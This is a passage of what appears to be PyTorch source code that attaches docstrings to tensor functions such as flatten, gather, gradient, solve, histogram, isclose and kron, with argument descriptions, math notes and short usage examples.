This function's behavior is undefined when passed an object implementing
the buffer protocol whose data is not on the CPU. Doing so is likely to
cause a segmentation fault.
.. warning::
This function does not try to infer the :attr:`dtype` (hence, it is not
optional). Passing a different :attr:`dtype` than its source may result
in unexpected behavior.
Args:
buffer (object): a Python object that exposes the buffer interface.
Keyword args:
dtype (:class:`torch.dtype`): the desired data type of returned tensor.
count (int, optional): the number of desired elements to be read.
If negative, all the elements (until the end of the buffer) will be
read. Default: -1.
offset (int, optional): the number of bytes to skip at the start of
the buffer. Default: 0.
{requires_grad}
Example::
>>> import array
>>> a = array.array('i', [1, 2, 3])
>>> t = torch.frombuffer(a, dtype=torch.int32)
>>> t
tensor([ 1, 2, 3])
>>> t[0] = -1
>>> a
array([-1, 2, 3])
>>> # Interprets the signed char bytes as 32-bit integers.
>>> # Each 4 signed char elements will be interpreted as
>>> # 1 signed 32-bit integer.
>>> import array
>>> a = array.array('b', [-1, 0, 0, 0])
>>> torch.frombuffer(a, dtype=torch.int32)
tensor([255], dtype=torch.int32)
""".format(**factory_common_args))
add_docstr(torch.flatten,
r"""
flatten(input, start_dim=0, end_dim=-1) -> Tensor
Flattens :attr:`input` by reshaping it into a one-dimensional tensor. If :attr:`start_dim` or :attr:`end_dim`
are passed, only dimensions starting with :attr:`start_dim` and ending with :attr:`end_dim` are flattened.
The order of elements in :attr:`input` is unchanged.
Unlike NumPy's flatten, which always copies input's data, this function may return the original object, a view,
or copy. If no dimensions are flattened, then the original object :attr:`input` is returned. Otherwise, if input can
be viewed as the flattened shape, then that view is returned. Finally, only if the input cannot be viewed as the
flattened shape is input's data copied. See :meth:`torch.Tensor.view` for details on when a view will be returned.
.. note::
Flattening a zero-dimensional tensor will return a one-dimensional view.
Args:
{input}
start_dim (int): the first dim to flatten
end_dim (int): the last dim to flatten
Example::
>>> t = torch.tensor([[[1, 2],
... [3, 4]],
... [[5, 6],
... [7, 8]]])
>>> torch.flatten(t)
tensor([1, 2, 3, 4, 5, 6, 7, 8])
>>> torch.flatten(t, start_dim=1)
tensor([[1, 2, 3, 4],
[5, 6, 7, 8]])
""".format(**common_args))
add_docstr(torch.gather,
r"""
gather(input, dim, index, *, sparse_grad=False, out=None) -> Tensor
Gathers values along an axis specified by `dim`.
For a 3-D tensor the output is specified by::
out[i][j][k] = input[index[i][j][k]][j][k] # if dim == 0
out[i][j][k] = input[i][index[i][j][k]][k] # if dim == 1
out[i][j][k] = input[i][j][index[i][j][k]] # if dim == 2
:attr:`input` and :attr:`index` must have the same number of dimensions.
It is also required that ``index.size(d) <= input.size(d)`` for all
dimensions ``d != dim``. :attr:`out` will have the same shape as :attr:`index`.
Note that ``input`` and ``index`` do not broadcast against each other.
Args:
input (Tensor): the source tensor
dim (int): the axis along which to index
index (LongTensor): the indices of elements to gather
Keyword arguments:
sparse_grad (bool, optional): If ``True``, gradient w.r.t. :attr:`input` will be a sparse tensor.
out (Tensor, optional): the destination tensor
Example::
>>> t = torch.tensor([[1, 2], [3, 4]])
>>> torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]]))
tensor([[ 1, 1],
[ 4, 3]])
""")
add_docstr(torch.gcd,
r"""
gcd(input, other, *, out=None) -> Tensor
Computes the element-wise greatest common divisor (GCD) of :attr:`input` and :attr:`other`.
Both :attr:`input` and :attr:`other` must have integer types.
.. note::
This defines :math:`gcd(0, 0) = 0`.
Args:
{input}
other (Tensor): the second input tensor
Keyword arguments:
{out}
Example::
>>> a = torch.tensor([5, 10, 15])
>>> b = torch.tensor([3, 4, 5])
>>> torch.gcd(a, b)
tensor([1, 2, 5])
>>> c = torch.tensor([3])
>>> torch.gcd(a, c)
tensor([1, 1, 3])
""".format(**common_args))
add_docstr(torch.ge, r"""
ge(input, other, *, out=None) -> Tensor
Computes :math:`\text{input} \geq \text{other}` element-wise.
""" + r"""
The second argument can be a number or a tensor whose shape is
:ref:`broadcastable <broadcasting-semantics>` with the first argument.
Args:
input (Tensor): the tensor to compare
other (Tensor or float): the tensor or value to compare
Keyword args:
{out}
Returns:
A boolean tensor that is True where :attr:`input` is greater than or equal to :attr:`other` and False elsewhere
Example::
>>> torch.ge(torch.tensor([[1, 2], [3, 4]]), torch.tensor([[1, 1], [4, 4]]))
tensor([[True, True], [False, True]])
""".format(**common_args))
add_docstr(torch.greater_equal, r"""
greater_equal(input, other, *, out=None) -> Tensor
Alias for :func:`torch.ge`.
""")
add_docstr(torch.gradient,
r"""
gradient(input, *, spacing=1, dim=None, edge_order=1) -> List of Tensors
Estimates the gradient of a function :math:`g : \mathbb{R}^n \rightarrow \mathbb{R}` in
one or more dimensions using the `second-order accurate central differences method
<https://www.ams.org/journals/mcom/1988-51-184/S0025-5718-1988-0935077-0/S0025-5718-1988-0935077-0.pdf>`_.
The gradient of :math:`g` is estimated using samples. By default, when :attr:`spacing` is not
specified, the samples are entirely described by :attr:`input`, and the mapping of input coordinates
to an output is the same as the tensor's mapping of indices to values. For example, for a three-dimensional
:attr:`input` the function described is :math:`g : \mathbb{R}^3 \rightarrow \mathbb{R}`, and
:math:`g(1, 2, 3)\ == input[1, 2, 3]`.
When :attr:`spacing` is specified, it modifies the relationship between :attr:`input` and input coordinates.
This is detailed in the "Keyword Arguments" section below.
The gradient is estimated by estimating each partial derivative of :math:`g` independently. This estimation is
accurate if :math:`g` is in :math:`C^3` (it has at least 3 continuous derivatives), and the estimation can be
improved by providing closer samples. Mathematically, the value at each interior point of a partial derivative
is estimated using `Taylor’s theorem with remainder <https://en.wikipedia.org/wiki/Taylor%27s_theorem>`_.
Letting :math:`x` be an interior point and :math:`x+h_r` be point neighboring it, the partial gradient at
:math:`f(x+h_r)` is estimated using:
.. math::
\begin{aligned}
f(x+h_r) = f(x) + h_r f'(x) + {h_r}^2 \frac{f''(x)}{2} + {h_r}^3 \frac{f'''(x_r)}{6} \\
\end{aligned}
where :math:`x_r` is a number in the interval :math:`[x, x+ h_r]` and using the fact that :math:`f \in C^3`
we derive :
.. math::
f'(x) \approx \frac{ {h_l}^2 f(x+h_r) - {h_r}^2 f(x-h_l)
+ ({h_r}^2-{h_l}^2 ) f(x) }{ {h_r} {h_l}^2 + {h_r}^2 {h_l} }
.. note::
We estimate the gradient of functions in complex domain
:math:`g : \mathbb{C}^n \rightarrow \mathbb{C}` in the same way.
The value of each partial derivative at the boundary points is computed differently. See edge_order below.
Args:
input (``Tensor``): the tensor that represents the values of the function
Keyword args:
spacing (``scalar``, ``list of scalar``, ``list of Tensor``, optional): :attr:`spacing` can be used to modify
how the :attr:`input` tensor's indices relate to sample coordinates. If :attr:`spacing` is a scalar then
the indices are multiplied by the scalar to produce the coordinates. For example, if :attr:`spacing=2` the
indices (1, 2, 3) become coordinates (2, 4, 6). If :attr:`spacing` is a list of scalars then the corresponding
indices are multiplied. For example, if :attr:`spacing=(2, -1, 3)` the indices (1, 2, 3) become coordinates (2, -2, 9).
Finally, if :attr:`spacing` is a list of one-dimensional tensors then each tensor specifies the coordinates for
the corresponding dimension. For example, if the indices are (1, 2, 3) and the tensors are (t0, t1, t2), then
the coordinates are (t0[1], t1[2], t2[3])
dim (``int``, ``list of int``, optional): the dimension or dimensions to approximate the gradient over. By default
the partial gradient in every dimension is computed. Note that when :attr:`dim` is specified the elements of
the :attr:`spacing` argument must correspond with the specified dims."
edge_order (``int``, optional): 1 or 2, for `first-order
<https://www.ams.org/journals/mcom/1988-51-184/S0025-5718-1988-0935077-0/S0025-5718-1988-0935077-0.pdf>`_ or
`second-order <https://www.ams.org/journals/mcom/1988-51-184/S0025-5718-1988-0935077-0/S0025-5718-1988-0935077-0.pdf>`_
estimation of the boundary ("edge") values, respectively.
Examples::
>>> # Estimates the gradient of f(x)=x^2 at points [-2, -1, 2, 4]
>>> coordinates = (torch.tensor([-2., -1., 1., 4.]),)
>>> values = torch.tensor([4., 1., 1., 16.], )
>>> torch.gradient(values, spacing = coordinates)
(tensor([-3., -2., 2., 5.]),)
>>> # Estimates the gradient of the R^2 -> R function whose samples are
>>> # described by the tensor t. Implicit coordinates are [0, 1] for the outermost
>>> # dimension and [0, 1, 2, 3] for the innermost dimension, and function estimates
>>> # partial derivative for both dimensions.
>>> t = torch.tensor([[1, 2, 4, 8], [10, 20, 40, 80]])
>>> torch.gradient(t)
(tensor([[ 9., 18., 36., 72.],
[ 9., 18., 36., 72.]]),
tensor([[ 1.0000, 1.5000, 3.0000, 4.0000],
[10.0000, 15.0000, 30.0000, 40.0000]]))
>>> # A scalar value for spacing modifies the relationship between tensor indices
>>> # and input coordinates by multiplying the indices to find the
>>> # coordinates. For example, below the indices of the innermost
>>> # 0, 1, 2, 3 translate to coordinates of [0, 2, 4, 6], and the indices of
>>> # the outermost dimension 0, 1 translate to coordinates of [0, 2].
>>> torch.gradient(t, spacing = 2.0) # dim = None (implicitly [0, 1])
(tensor([[ 4.5000, 9.0000, 18.0000, 36.0000],
[ 4.5000, 9.0000, 18.0000, 36.0000]]),
tensor([[ 0.5000, 0.7500, 1.5000, 2.0000],
[ 5.0000, 7.5000, 15.0000, 20.0000]]))
>>> # doubling the spacing between samples halves the estimated partial gradients.
>>>
>>> # Estimates only the partial derivative for dimension 1
>>> torch.gradient(t, dim = 1) # spacing = None (implicitly 1.)
(tensor([[ 1.0000, 1.5000, 3.0000, 4.0000],
[10.0000, 15.0000, 30.0000, 40.0000]]),)
>>> # When spacing is a list of scalars, the relationship between the tensor
>>> # indices and input coordinates changes based on dimension.
>>> # For example, below, the indices of the innermost dimension 0, 1, 2, 3 translate
>>> # to coordinates of [0, 3, 6, 9], and the indices of the outermost dimension
>>> # 0, 1 translate to coordinates of [0, 2].
>>> torch.gradient(t, spacing = [3., 2.])
(tensor([[ 4.5000, 9.0000, 18.0000, 36.0000],
[ 4.5000, 9.0000, 18.0000, 36.0000]]),
tensor([[ 0.3333, 0.5000, 1.0000, 1.3333],
[ 3.3333, 5.0000, 10.0000, 13.3333]]))
>>> # The following example is a replication of the previous one with explicit
>>> # coordinates.
>>> coords = (torch.tensor([0, 2]), torch.tensor([0, 3, 6, 9]))
>>> torch.gradient(t, spacing = coords)
(tensor([[ 4.5000, 9.0000, 18.0000, 36.0000],
[ 4.5000, 9.0000, 18.0000, 36.0000]]),
tensor([[ 0.3333, 0.5000, 1.0000, 1.3333],
[ 3.3333, 5.0000, 10.0000, 13.3333]]))
""")
add_docstr(torch.geqrf,
r"""
geqrf(input, *, out=None) -> (Tensor, Tensor)
This is a low-level function for calling LAPACK's geqrf directly. This function
returns a namedtuple (a, tau) as defined in `LAPACK documentation for geqrf`_ .
Computes a QR decomposition of :attr:`input`.
Both `Q` and `R` matrices are stored in the same output tensor `a`.
The elements of `R` are stored on and above the diagonal.
Elementary reflectors (or Householder vectors) implicitly defining matrix `Q`
are stored below the diagonal.
The results of this function can be used together with :func:`torch.linalg.householder_product`
to obtain the `Q` matrix or
with :func:`torch.ormqr`, which uses an implicit representation of the `Q` matrix,
for an efficient matrix-matrix multiplication.
See `LAPACK documentation for geqrf`_ for further details.
.. note::
See also :func:`torch.linalg.qr`, which computes Q and R matrices, and :func:`torch.linalg.lstsq`
with the ``driver="gels"`` option for a function that can solve matrix equations using a QR decomposition.
Args:
input (Tensor): the input matrix
Keyword args:
out (tuple, optional): the output tuple of (Tensor, Tensor). Ignored if `None`. Default: `None`.
.. _LAPACK documentation for geqrf:
http://www.netlib.org/lapack/explore-html/df/dc5/group__variants_g_ecomputational_ga3766ea903391b5cf9008132f7440ec7b.html
""")
add_docstr(torch.inner, r"""
inner(input, other, *, out=None) -> Tensor
Computes the dot product for 1D tensors. For higher dimensions, sums the product
of elements from :attr:`input` and :attr:`other` along their last dimension.
.. note::
If either :attr:`input` or :attr:`other` is a scalar, the result is equivalent
to `torch.mul(input, other)`.
If both :attr:`input` and :attr:`other` are non-scalars, the size of their last
dimension must match and the result is equivalent to `torch.tensordot(input,
other, dims=([-1], [-1]))`
Args:
input (Tensor): First input tensor
other (Tensor): Second input tensor
Keyword args:
out (Tensor, optional): Optional output tensor to write result into. The output
shape is `input.shape[:-1] + other.shape[:-1]`.
Example::
# Dot product
>>> torch.inner(torch.tensor([1, 2, 3]), torch.tensor([0, 2, 1]))
tensor(7)
# Multidimensional input tensors
>>> a = torch.randn(2, 3)
>>> a
tensor([[0.8173, 1.0874, 1.1784],
[0.3279, 0.1234, 2.7894]])
>>> b = torch.randn(2, 4, 3)
>>> b
tensor([[[-0.4682, -0.7159, 0.1506],
[ 0.4034, -0.3657, 1.0387],
[ 0.9892, -0.6684, 0.1774],
[ 0.9482, 1.3261, 0.3917]],
[[ 0.4537, 0.7493, 1.1724],
[ 0.2291, 0.5749, -0.2267],
[-0.7920, 0.3607, -0.3701],
[ 1.3666, -0.5850, -1.7242]]])
>>> torch.inner(a, b)
tensor([[[-0.9837, 1.1560, 0.2907, 2.6785],
[ 2.5671, 0.5452, -0.6912, -1.5509]],
[[ 0.1782, 2.9843, 0.7366, 1.5672],
[ 3.5115, -0.4864, -1.2476, -4.4337]]])
# Scalar input
>>> torch.inner(a, torch.tensor(2))
tensor([[1.6347, 2.1748, 2.3567],
[0.6558, 0.2469, 5.5787]])
""")
add_docstr(torch.outer, r"""
outer(input, vec2, *, out=None) -> Tensor
Outer product of :attr:`input` and :attr:`vec2`.
If :attr:`input` is a vector of size :math:`n` and :attr:`vec2` is a vector of
size :math:`m`, then :attr:`out` must be a matrix of size :math:`(n \times m)`.
.. note:: This function does not :ref:`broadcast <broadcasting-semantics>`.
Args:
input (Tensor): 1-D input vector
vec2 (Tensor): 1-D input vector
Keyword args:
out (Tensor, optional): optional output matrix
Example::
>>> v1 = torch.arange(1., 5.)
>>> v2 = torch.arange(1., 4.)
>>> torch.outer(v1, v2)
tensor([[ 1., 2., 3.],
[ 2., 4., 6.],
[ 3., 6., 9.],
[ 4., 8., 12.]])
""")
add_docstr(torch.ger,
r"""
ger(input, vec2, *, out=None) -> Tensor
Alias of :func:`torch.outer`.
.. warning::
This function is deprecated and will be removed in a future PyTorch release.
Use :func:`torch.outer` instead.
""")
add_docstr(torch.solve,
r"""
torch.solve(input, A, *, out=None) -> (Tensor, Tensor)
This function returns the solution to the system of linear
equations represented by :math:`AX = B` and the LU factorization of
A, in order as a namedtuple `solution, LU`.
`LU` contains `L` and `U` factors for LU factorization of `A`.
`torch.solve(B, A)` can take in 2D inputs `B, A` or inputs that are
batches of 2D matrices. If the inputs are batches, then returns
batched outputs `solution, LU`.
Supports real-valued and complex-valued inputs.
.. warning::
:func:`torch.solve` is deprecated in favor of :func:`torch.linalg.solve`
and will be removed in a future PyTorch release.
:func:`torch.linalg.solve` has its arguments reversed and does not return the
LU factorization of the input. To get the LU factorization see :func:`torch.lu`,
which may be used with :func:`torch.lu_solve` and :func:`torch.lu_unpack`.
``X = torch.solve(B, A).solution`` should be replaced with
.. code:: python
X = torch.linalg.solve(A, B)
.. note::
Irrespective of the original strides, the returned matrices
`solution` and `LU` will be transposed, i.e. with strides like
`B.contiguous().mT.stride()` and
`A.contiguous().mT.stride()` respectively.
Args:
input (Tensor): input matrix :math:`B` of size :math:`(*, m, k)` , where :math:`*`
is zero or more batch dimensions.
A (Tensor): input square matrix of size :math:`(*, m, m)`, where
:math:`*` is zero or more batch dimensions.
Keyword args:
out ((Tensor, Tensor), optional): optional output tuple.
Example::
>>> A = torch.tensor([[6.80, -2.11, 5.66, 5.97, 8.23],
... [-6.05, -3.30, 5.36, -4.44, 1.08],
... [-0.45, 2.58, -2.70, 0.27, 9.04],
... [8.32, 2.71, 4.35, -7.17, 2.14],
... [-9.67, -5.14, -7.26, 6.08, -6.87]]).t()
>>> B = torch.tensor([[4.02, 6.19, -8.22, -7.57, -3.03],
... [-1.56, 4.00, -8.67, 1.75, 2.86],
... [9.81, -4.09, -4.57, -8.61, 8.99]]).t()
>>> X, LU = torch.solve(B, A)
>>> torch.dist(B, torch.mm(A, X))
tensor(1.00000e-06 *
7.0977)
>>> # Batched solver example
>>> A = torch.randn(2, 3, 1, 4, 4)
>>> B = torch.randn(2, 3, 1, 4, 6)
>>> X, LU = torch.solve(B, A)
>>> torch.dist(B, A.matmul(X))
tensor(1.00000e-06 *
3.6386)
""")
add_docstr(torch.get_default_dtype,
r"""
get_default_dtype() -> torch.dtype
Get the current default floating point :class:`torch.dtype`.
Example::
>>> torch.get_default_dtype() # initial default for floating point is torch.float32
torch.float32
>>> torch.set_default_dtype(torch.float64)
>>> torch.get_default_dtype() # default is now changed to torch.float64
torch.float64
>>> torch.set_default_tensor_type(torch.FloatTensor) # setting tensor type also affects this
>>> torch.get_default_dtype() # changed to torch.float32, the dtype for torch.FloatTensor
torch.float32
""")
add_docstr(torch.get_num_threads,
r"""
get_num_threads() -> int
Returns the number of threads used for parallelizing CPU operations
""")
add_docstr(torch.get_num_interop_threads,
r"""
get_num_interop_threads() -> int
Returns the number of threads used for inter-op parallelism on CPU
(e.g. in JIT interpreter)
""")
add_docstr(torch.gt, r"""
gt(input, other, *, out=None) -> Tensor
Computes :math:`\text{input} > \text{other}` element-wise.
""" + r"""
The second argument can be a number or a tensor whose shape is
:ref:`broadcastable <broadcasting-semantics>` with the first argument.
Args:
input (Tensor): the tensor to compare
other (Tensor or float): the tensor or value to compare
Keyword args:
{out}
Returns:
A boolean tensor that is True where :attr:`input` is greater than :attr:`other` and False elsewhere
Example::
>>> torch.gt(torch.tensor([[1, 2], [3, 4]]), torch.tensor([[1, 1], [4, 4]]))
tensor([[False, True], [False, False]])
""".format(**common_args))
add_docstr(torch.greater, r"""
greater(input, other, *, out=None) -> Tensor
Alias for :func:`torch.gt`.
""")
add_docstr(torch.histc,
r"""
histc(input, bins=100, min=0, max=0, *, out=None) -> Tensor
Computes the histogram of a tensor.
The elements are sorted into equal width bins between :attr:`min` and
:attr:`max`. If :attr:`min` and :attr:`max` are both zero, the minimum and
maximum values of the data are used.
Elements lower than min and higher than max are ignored.
Args:
{input}
bins (int): number of histogram bins
min (Scalar): lower end of the range (inclusive)
max (Scalar): upper end of the range (inclusive)
Keyword args:
{out}
Returns:
Tensor: Histogram represented as a tensor
Example::
>>> torch.histc(torch.tensor([1., 2, 1]), bins=4, min=0, max=3)
tensor([ 0., 2., 1., 0.])
""".format(**common_args))
add_docstr(torch.histogram,
r"""
histogram(input, bins, *, range=None, weight=None, density=False, out=None) -> (Tensor, Tensor)
Computes a histogram of the values in a tensor.
:attr:`bins` can be an integer or a 1D tensor.
If :attr:`bins` is an int, it specifies the number of equal-width bins.
By default, the lower and upper range of the bins is determined by the
minimum and maximum elements of the input tensor. The :attr:`range`
argument can be provided to specify a range for the bins.
If :attr:`bins` is a 1D tensor, it specifies the sequence of bin edges
including the rightmost edge. It should contain at least 2 elements
and its elements should be increasing.
Args:
{input}
bins: int or 1D Tensor. If int, defines the number of equal-width bins. If tensor,
defines the sequence of bin edges including the rightmost edge.
Keyword args:
range (tuple of float): Defines the range of the bins.
weight (Tensor): If provided, weight should have the same shape as input. Each value in
input contributes its associated weight towards its bin's result.
density (bool): If False, the result will contain the count (or total weight) in each bin.
If True, the result is the value of the probability density function over the bins,
normalized such that the integral over the range of the bins is 1.
{out} (tuple, optional): The result tuple of two output tensors (hist, bin_edges).
Returns:
hist (Tensor): 1D Tensor containing the values of the histogram.
bin_edges(Tensor): 1D Tensor containing the edges of the histogram bins.
Example::
>>> torch.histogram(torch.tensor([1., 2, 1]), bins=4, range=(0., 3.), weight=torch.tensor([1., 2., 4.]))
(tensor([ 0., 5., 2., 0.]), tensor([0., 0.75, 1.5, 2.25, 3.]))
>>> torch.histogram(torch.tensor([1., 2, 1]), bins=4, range=(0., 3.), weight=torch.tensor([1., 2., 4.]), density=True)
(tensor([ 0., 0.9524, 0.3810, 0.]), tensor([0., 0.75, 1.5, 2.25, 3.]))
""".format(**common_args))
add_docstr(torch.hypot,
r"""
hypot(input, other, *, out=None) -> Tensor
Given the legs of a right triangle, return its hypotenuse.
.. math::
\text{out}_{i} = \sqrt{\text{input}_{i}^{2} + \text{other}_{i}^{2}}
The shapes of ``input`` and ``other`` must be
:ref:`broadcastable <broadcasting-semantics>`.
""" + r"""
Args:
input (Tensor): the first input tensor
other (Tensor): the second input tensor
Keyword args:
{out}
Example::
>>> a = torch.hypot(torch.tensor([4.0]), torch.tensor([3.0, 4.0, 5.0]))
tensor([5.0000, 5.6569, 6.4031])
""".format(**common_args))
add_docstr(torch.i0,
r"""
i0(input, *, out=None) -> Tensor
Alias for :func:`torch.special.i0`.
""")
add_docstr(torch.igamma,
r"""
igamma(input, other, *, out=None) -> Tensor
Alias for :func:`torch.special.gammainc`.
""")
add_docstr(torch.igammac,
r"""
igammac(input, other, *, out=None) -> Tensor
Alias for :func:`torch.special.gammaincc`.
""")
add_docstr(torch.index_select,
r"""
index_select(input, dim, index, *, out=None) -> Tensor
Returns a new tensor which indexes the :attr:`input` tensor along dimension
:attr:`dim` using the entries in :attr:`index` which is a `LongTensor`.
The returned tensor has the same number of dimensions as the original tensor
(:attr:`input`). The :attr:`dim`\ th dimension has the same size as the length
of :attr:`index`; other dimensions have the same size as in the original tensor.
.. note:: The returned tensor does **not** use the same storage as the original
tensor. If :attr:`out` has a different shape than expected, we
silently change it to the correct shape, reallocating the underlying
storage if necessary.
Args:
{input}
dim (int): the dimension in which we index
index (IntTensor or LongTensor): the 1-D tensor containing the indices to index
Keyword args:
{out}
Example::
>>> x = torch.randn(3, 4)
>>> x
tensor([[ 0.1427, 0.0231, -0.5414, -1.0009],
[-0.4664, 0.2647, -0.1228, -1.1068],
[-1.1734, -0.6571, 0.7230, -0.6004]])
>>> indices = torch.tensor([0, 2])
>>> torch.index_select(x, 0, indices)
tensor([[ 0.1427, 0.0231, -0.5414, -1.0009],
[-1.1734, -0.6571, 0.7230, -0.6004]])
>>> torch.index_select(x, 1, indices)
tensor([[ 0.1427, -0.5414],
[-0.4664, -0.1228],
[-1.1734, 0.7230]])
""".format(**common_args))
add_docstr(torch.inverse, r"""
inverse(input, *, out=None) -> Tensor
Alias for :func:`torch.linalg.inv`
""")
add_docstr(torch.isin, r"""
isin(elements, test_elements, *, assume_unique=False, invert=False) -> Tensor
Tests if each element of :attr:`elements` is in :attr:`test_elements`. Returns
a boolean tensor of the same shape as :attr:`elements` that is True for elements
in :attr:`test_elements` and False otherwise.
.. note::
One of :attr:`elements` or :attr:`test_elements` can be a scalar, but not both.
Args:
elements (Tensor or Scalar): Input elements
test_elements (Tensor or Scalar): Values against which to test for each input element
assume_unique (bool, optional): If True, assumes both :attr:`elements` and
:attr:`test_elements` contain unique elements, which can speed up the
calculation. Default: False
invert (bool, optional): If True, inverts the boolean return tensor, resulting in True
values for elements *not* in :attr:`test_elements`. Default: False
Returns:
A boolean tensor of the same shape as :attr:`elements` that is True for elements in
:attr:`test_elements` and False otherwise
Example:
>>> torch.isin(torch.tensor([[1, 2], [3, 4]]), torch.tensor([2, 3]))
tensor([[False, True],
[ True, False]])
""")
add_docstr(torch.isinf, r"""
isinf(input) -> Tensor
Tests if each element of :attr:`input` is infinite
(positive or negative infinity) or not.
.. note::
Complex values are infinite when their real or imaginary part is
infinite.
Args:
{input}
Returns:
A boolean tensor that is True where :attr:`input` is infinite and False elsewhere
Example::
>>> torch.isinf(torch.tensor([1, float('inf'), 2, float('-inf'), float('nan')]))
tensor([False, True, False, True, False])
""".format(**common_args))
add_docstr(torch.isposinf,
r"""
isposinf(input, *, out=None) -> Tensor
Tests if each element of :attr:`input` is positive infinity or not.
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.tensor([-float('inf'), float('inf'), 1.2])
>>> torch.isposinf(a)
tensor([False, True, False])
""".format(**common_args))
add_docstr(torch.isneginf,
r"""
isneginf(input, *, out=None) -> Tensor
Tests if each element of :attr:`input` is negative infinity or not.
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.tensor([-float('inf'), float('inf'), 1.2])
>>> torch.isneginf(a)
tensor([ True, False, False])
""".format(**common_args))
add_docstr(torch.isclose, r"""
isclose(input, other, rtol=1e-05, atol=1e-08, equal_nan=False) -> Tensor
Returns a new tensor with boolean elements representing if each element of
:attr:`input` is "close" to the corresponding element of :attr:`other`.
Closeness is defined as:
.. math::
\lvert \text{input} - \text{other} \rvert \leq \texttt{atol} + \texttt{rtol} \times \lvert \text{other} \rvert
""" + r"""
where :attr:`input` and :attr:`other` are finite. Where :attr:`input`
and/or :attr:`other` are nonfinite they are close if and only if
they are equal, with NaNs being considered equal to each other when
:attr:`equal_nan` is True.
Args:
input (Tensor): first tensor to compare
other (Tensor): second tensor to compare
atol (float, optional): absolute tolerance. Default: 1e-08
rtol (float, optional): relative tolerance. Default: 1e-05
equal_nan (bool, optional): if ``True``, then two ``NaN`` s will be considered equal. Default: ``False``
Examples::
>>> torch.isclose(torch.tensor((1., 2, 3)), torch.tensor((1 + 1e-10, 3, 4)))
tensor([ True, False, False])
>>> torch.isclose(torch.tensor((float('inf'), 4)), torch.tensor((float('inf'), 6)), rtol=.5)
tensor([True, True])
""")
add_docstr(torch.isfinite, r"""
isfinite(input) -> Tensor
Returns a new tensor with boolean elements representing if each element is `finite` or not.
Real values are finite when they are not NaN, negative infinity, or infinity.
Complex values are finite when both their real and imaginary parts are finite.
Args:
{input}
Returns:
A boolean tensor that is True where :attr:`input` is finite and False elsewhere
Example::
>>> torch.isfinite(torch.tensor([1, float('inf'), 2, float('-inf'), float('nan')]))
tensor([True, False, True, False, False])
""".format(**common_args))
add_docstr(torch.isnan, r"""
isnan(input) -> Tensor
Returns a new tensor with boolean elements representing if each element of :attr:`input`
is NaN or not. Complex values are considered NaN when either their real
and/or imaginary part is NaN.
Arguments:
{input}
Returns:
A boolean tensor that is True where :attr:`input` is NaN and False elsewhere
Example::
>>> torch.isnan(torch.tensor([1, float('nan'), 2]))
tensor([False, True, False])
""".format(**common_args))
add_docstr(torch.isreal, r"""
isreal(input) -> Tensor
Returns a new tensor with boolean elements representing if each element of :attr:`input` is real-valued or not.
All real-valued types are considered real. Complex values are considered real when their imaginary part is 0.
Arguments:
{input}
Returns:
A boolean tensor that is True where :attr:`input` is real and False elsewhere
Example::
>>> torch.isreal(torch.tensor([1, 1+1j, 2+0j]))
tensor([True, False, True])
""".format(**common_args))
add_docstr(torch.is_floating_point, r"""
is_floating_point(input) -> (bool)
Returns True if the data type of :attr:`input` is a floating point data type i.e.,
one of ``torch.float64``, ``torch.float32``, ``torch.float16``, and ``torch.bfloat16``.
Args:
{input}
""".format(**common_args))
add_docstr(torch.is_complex, r"""
is_complex(input) -> (bool)
Returns True if the data type of :attr:`input` is a complex data type i.e.,
one of ``torch.complex64``, and ``torch.complex128``.
Args:
{input}
""".format(**common_args))
add_docstr(torch.is_grad_enabled, r"""
is_grad_enabled() -> (bool)
Returns True if grad mode is currently enabled.
""".format(**common_args))
add_docstr(torch.is_inference_mode_enabled, r"""
is_inference_mode_enabled() -> (bool)
Returns True if inference mode is currently enabled.
""".format(**common_args))
add_docstr(torch.is_inference, r"""
is_inference(input) -> (bool)
Returns True if :attr:`input` is an inference tensor.
A non-view tensor is an inference tensor if and only if it was
allocated during inference mode. A view tensor is an inference
tensor if and only if the tensor it is a view of is an inference tensor.
For details on inference mode please see
`Inference Mode <https://pytorch.org/cppdocs/notes/inference_mode.html>`_.
Args:
{input}
""".format(**common_args))
add_docstr(torch.is_conj, r"""
is_conj(input) -> (bool)
Returns True if the :attr:`input` is a conjugated tensor, i.e. its conjugate bit is set to `True`.
Args:
{input}
""".format(**common_args))
add_docstr(torch.is_nonzero, r"""
is_nonzero(input) -> (bool)
Returns True if the :attr:`input` is a single element tensor which is not equal to zero
after type conversions.
i.e. not equal to ``torch.tensor([0.])`` or ``torch.tensor([0])`` or
``torch.tensor([False])``.
Throws a ``RuntimeError`` if ``torch.numel() != 1`` (even in case
of sparse tensors).
Args:
{input}
Examples::
>>> torch.is_nonzero(torch.tensor([0.]))
False
>>> torch.is_nonzero(torch.tensor([1.5]))
True
>>> torch.is_nonzero(torch.tensor([False]))
False
>>> torch.is_nonzero(torch.tensor([3]))
True
>>> torch.is_nonzero(torch.tensor([1, 3, 5]))
Traceback (most recent call last):
...
RuntimeError: bool value of Tensor with more than one value is ambiguous
>>> torch.is_nonzero(torch.tensor([]))
Traceback (most recent call last):
...
RuntimeError: bool value of Tensor with no values is ambiguous
""".format(**common_args))
add_docstr(torch.kron,
r"""
kron(input, other, *, out=None) -> Tensor
Computes the Kronecker product, denoted by :math:`\otimes`, of :attr:`input` and :attr:`other`.
If :attr:`input` is a :math:`(a_0 \times a_1 \times \dots \times a_n)` tensor and :attr:`other` is a
:math:`(b_0 \times b_1 \times \dots \times b_n)` tensor, the result will be a
:math:`(a_0*b_0 \times a_1*b_1 \times \dots \times a_n*b_n)` tensor with the following entries:
.. math::
(\text{input} \otimes \text{other})_{k_0, k_1, \dots, k_n} =
\text{input}_{i_0, i_1, \dots, i_n} * \text{other}_{j_0, j_1, \dots, j_n},
where :math:`k_t = i_t * b_t + j_t` for :math:`0 \leq t \leq n`.
If one tensor has fewer dimensions than the other it is unsqueezed until it has the same number of dimensions.
Supports real-valued and complex-valued inputs.
.. note::
This function generalizes the typical definition of the Kronecker product for two matrices to two tensors,
as described above. When :attr:`input` is a :math:`(m \times n)` matrix and :attr:`other` is a
:math:`(p \times q)` matrix, the result will be a :math:`(p*m \times q*n)` block matrix:
.. math::
\mathbf{A} \otimes \mathbf{B}=\begin{bmatrix}
a_{11} \mathbf{B} & \cdots & a_{1 n} \mathbf{B} \\
\vdots & \ddots & \vdots \\
a_{m 1} \mathbf{B} & \cdots & a_{m n} \mathbf{B} \end{bmatrix}
where :attr:`input` is :math:`\mathbf{A}` and :attr:`other` is :math:`\mathbf{B}`.
Arguments:
input (Tensor)
